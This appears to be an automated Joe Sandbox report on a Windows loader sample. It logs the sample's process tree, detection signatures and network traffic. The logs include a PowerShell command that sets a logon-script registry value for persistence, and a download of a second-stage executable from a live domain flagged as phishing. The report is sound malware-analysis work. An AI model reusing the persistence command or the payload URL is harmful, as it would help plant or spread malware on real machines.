Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip

Overview

General Information

Sample name:MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip
Analysis ID:1660018
MD5:4a85967edac8e7034a44702ffa2b9754
SHA1:1f4e868de790e4be51f375f27345ec0056860da1
SHA256:07318a66ab562d9f8ab9ae9c914644d5bb25fb11f72f705c8800d2bc4e0e0a65
Infos:

Detection

Score:64
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Creates HTML files with .exe extension (expired dropper behavior)
Creates an undocumented autostart registry key
Sigma detected: Potential Persistence Via Logon Scripts - CommandLine
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Common Autorun Keys Modification

Classification

  • System is w10x64_ra
  • rundll32.exe (PID: 7048 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • jPvnTotc.exe (PID: 3980 cmdline: "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip\jPvnTotc.exe" MD5: 5E65DBAF6A158B83F280B529368AB428)
    • powershell.exe (PID: 3568 cmdline: powershell.exe -c "Set-ItemProperty -Path 'HKCU:\Environment' -Name 'UserinitMprLogonScript' -Value 'C:\Users\user\AppData\Roaming\Microsoft\Protect\a2015df1dr.exe'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Tom Ueltschi (@c_APT_ure): Data: Command: powershell.exe -c "Set-ItemProperty -Path 'HKCU:\Environment' -Name 'UserinitMprLogonScript' -Value 'C:\Users\user\AppData\Roaming\Microsoft\Protect\a2015df1dr.exe'", CommandLine: powershell.exe -c "Set-ItemProperty -Path 'HKCU:\Environment' -Name 'UserinitMprLogonScript' -Value 'C:\Users\user\AppData\Roaming\Microsoft\Protect\a2015df1dr.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip\jPvnTotc.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip\jPvnTotc.exe, ParentProcessId: 3980, ParentProcessName: jPvnTotc.exe, ProcessCommandLine: powershell.exe -c "Set-ItemProperty -Path 'HKCU:\Environment' -Name 'UserinitMprLogonScript' -Value 'C:\Users\user\AppData\Roaming\Microsoft\Protect\a2015df1dr.exe'", ProcessId: 3568, ProcessName: powershell.exe
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name): Data: Details: C:\Users\user\AppData\Roaming\Microsoft\Protect\a2015df1dr.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3568, TargetObject: HKEY_CURRENT_USER\Environment\UserinitMprLogonScript
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -c "Set-ItemProperty -Path 'HKCU:\Environment' -Name 'UserinitMprLogonScript' -Value 'C:\Users\user\AppData\Roaming\Microsoft\Protect\a2015df1dr.exe'", CommandLine: powershell.exe -c "Set-ItemProperty -Path 'HKCU:\Environment' -Name 'UserinitMprLogonScript' -Value 'C:\Users\user\AppData\Roaming\Microsoft\Protect\a2015df1dr.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip\jPvnTotc.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip\jPvnTotc.exe, ParentProcessId: 3980, ParentProcessName: jPvnTotc.exe, ProcessCommandLine: powershell.exe -c "Set-ItemProperty -Path 'HKCU:\Environment' -Name 'UserinitMprLogonScript' -Value 'C:\Users\user\AppData\Roaming\Microsoft\Protect\a2015df1dr.exe'", ProcessId: 3568, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://smartlifeshift.com/dAvira URL Cloud: Label: phishing
Source: http://smartlifeshift.com/Avira URL Cloud: Label: phishing
Source: http://smartlifeshift.com/share/466cc0b75fa453dbf9b068341cea5e77f8543c626b7a905af578a415ae7791d0.exeAvira URL Cloud: Label: phishing
Source: Binary string: C:\Users\user\Desktop\LOADERS\LDR_V_1.1.3_HiddenFlag\Release\LDR_V_1.1.3_HiddenFlag.pdb source: jPvnTotc.exe, 00000009.00000000.1397638128.0000000000417000.00000002.00000001.01000000.00000006.sdmp

Networking

barindex
Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip\jPvnTotc.exeFile created: a2015df1dr.exe.9.dr
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /share/466cc0b75fa453dbf9b068341cea5e77f8543c626b7a905af578a415ae7791d0.exe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: lummaHost: smartlifeshift.com
Source: global trafficDNS traffic detected: DNS query: smartlifeshift.com
Source: jPvnTotc.exe, 00000009.00000002.1418406834.00000000007F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://smartlifeshift.com/
Source: jPvnTotc.exe, 00000009.00000002.1418406834.00000000007F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://smartlifeshift.com/d
Source: jPvnTotc.exe, 00000009.00000002.1418406834.00000000007F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://smartlifeshift.com/share/466cc0b75fa453dbf9b068341cea5e77f8543c626b7a905af578a415ae7791d0.exe
Source: classification engineClassification label: mal64.winZIP@6/5@1/1
Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip\jPvnTotc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Protect\a2015df1dr.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4496:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip\jPvnTotc.exeFile created: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip\jPvnTotc.exe.lnkJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip\jPvnTotc.exe "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip\jPvnTotc.exe"
Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip\jPvnTotc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "Set-ItemProperty -Path 'HKCU:\Environment' -Name 'UserinitMprLogonScript' -Value 'C:\Users\user\AppData\Roaming\Microsoft\Protect\a2015df1dr.exe'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip\jPvnTotc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "Set-ItemProperty -Path 'HKCU:\Environment' -Name 'UserinitMprLogonScript' -Value 'C:\Users\user\AppData\Roaming\Microsoft\Protect\a2015df1dr.exe'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip\jPvnTotc.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip\jPvnTotc.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip\jPvnTotc.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip\jPvnTotc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip\jPvnTotc.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip\jPvnTotc.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip\jPvnTotc.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip\jPvnTotc.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip\jPvnTotc.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip\jPvnTotc.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip\jPvnTotc.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip\jPvnTotc.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip\jPvnTotc.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip\jPvnTotc.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: C:\Users\user\Desktop\LOADERS\LDR_V_1.1.3_HiddenFlag\Release\LDR_V_1.1.3_HiddenFlag.pdb source: jPvnTotc.exe, 00000009.00000000.1397638128.0000000000417000.00000002.00000001.01000000.00000006.sdmp

Data Obfuscation

barindex
Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip\jPvnTotc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "Set-ItemProperty -Path 'HKCU:\Environment' -Name 'UserinitMprLogonScript' -Value 'C:\Users\user\AppData\Roaming\Microsoft\Protect\a2015df1dr.exe'"
Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip\jPvnTotc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "Set-ItemProperty -Path 'HKCU:\Environment' -Name 'UserinitMprLogonScript' -Value 'C:\Users\user\AppData\Roaming\Microsoft\Protect\a2015df1dr.exe'"Jump to behavior

Boot Survival

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_CURRENT_USER\Environment UserinitMprLogonScriptJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1373Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3506Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip\jPvnTotc.exe TID: 5888Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3756Thread sleep count: 1373 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3756Thread sleep count: 3506 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6740Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3788Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: jPvnTotc.exe, 00000009.00000002.1418406834.000000000080D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: jPvnTotc.exe, 00000009.00000002.1418406834.00000000007BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW h
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
